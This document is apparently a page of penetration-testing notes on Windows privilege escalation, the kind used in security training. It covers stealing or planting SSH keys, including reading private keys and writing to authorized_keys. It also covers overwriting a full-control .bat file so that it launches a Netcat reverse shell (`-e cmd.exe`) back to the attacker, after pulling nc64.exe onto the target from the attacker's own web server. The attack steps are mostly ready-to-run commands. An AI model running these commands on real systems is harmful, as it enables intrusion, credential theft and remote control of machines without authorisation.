Windows Privilege Escalation

Here are some techniques for achieving privilege escalation on Windows systems:

Abusing SSH keys

  • Check if we have reading permissions on the SSH private keys of a user

#On the target machine
type C:\Users\$user\.ssh\$keyfile    #For a user

Standard key files are called id_rsa

  • Copy the keys to a file, assign permissions to the file, and use it to log in using the key

#On our machine
nano $filename #Copy here the keys
chmod 600 $filename
ssh $username@$IP -i $filename

Use chmod 600 id_rsa to assign restrictive permissions and the SSH does not block this method

  • When having writing permissions on the .ssh/ directory of a user, we can generate an SSH key with the current user and pass it to the system

ssh-keygen -f $keyfile

This will generate the file with a private key for the user and a .pub file with a public key

  • Pass the public key to the authorized keys file of the root user

type $keyfilename.pub > C:\Users\$user\.ssh\authorized_keys

  • Use this to log in to the user using the key

ssh $username@$IP -i $keyfile

Abusing .bat files with full control permissions

In the situation where a .bat file (script file for Windows) is being executed on the system and it has full-control permissions, it's possible to abuse this to modify the content of the .bat file and execute commands with privileges arbitrarily

  • Try spawning a PowerShell from the CMD with any user we have access

...> powershell
PS ...>            #If it worked the command line will look like this

  • Find a .bat file, and check if it has full-control permissions. In case it has, check if it is calling any process and if any of them is still running

icacls $batFile #Check permissions
cat $batFile    #Check the content to know if is calling any process
ps              #Check if called processes are still running

  • Download and import a Netcat executable for Windows

# In our machine
wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe #Get NC executable
python3 -m http.server $myPort #On the folder where we have the executable

# In the target machine
wget http://$myIP:$myPort/nc64.exe -outfile nc64.exe

  • Set Netcat listener to catch the connection and replace the content of the .bat file with a command spawning the Netcat executable

# In our machine
nc -nvlp $ncPort

# In the target machine
echo $ncFilePath -e cmd.exe $myIP $ncPort > $batFilePath

Then we just had to wait for the system to run again the script, now executing our payload

PreviousLinux Privilege EscalationNextTools and Utilities

Last updated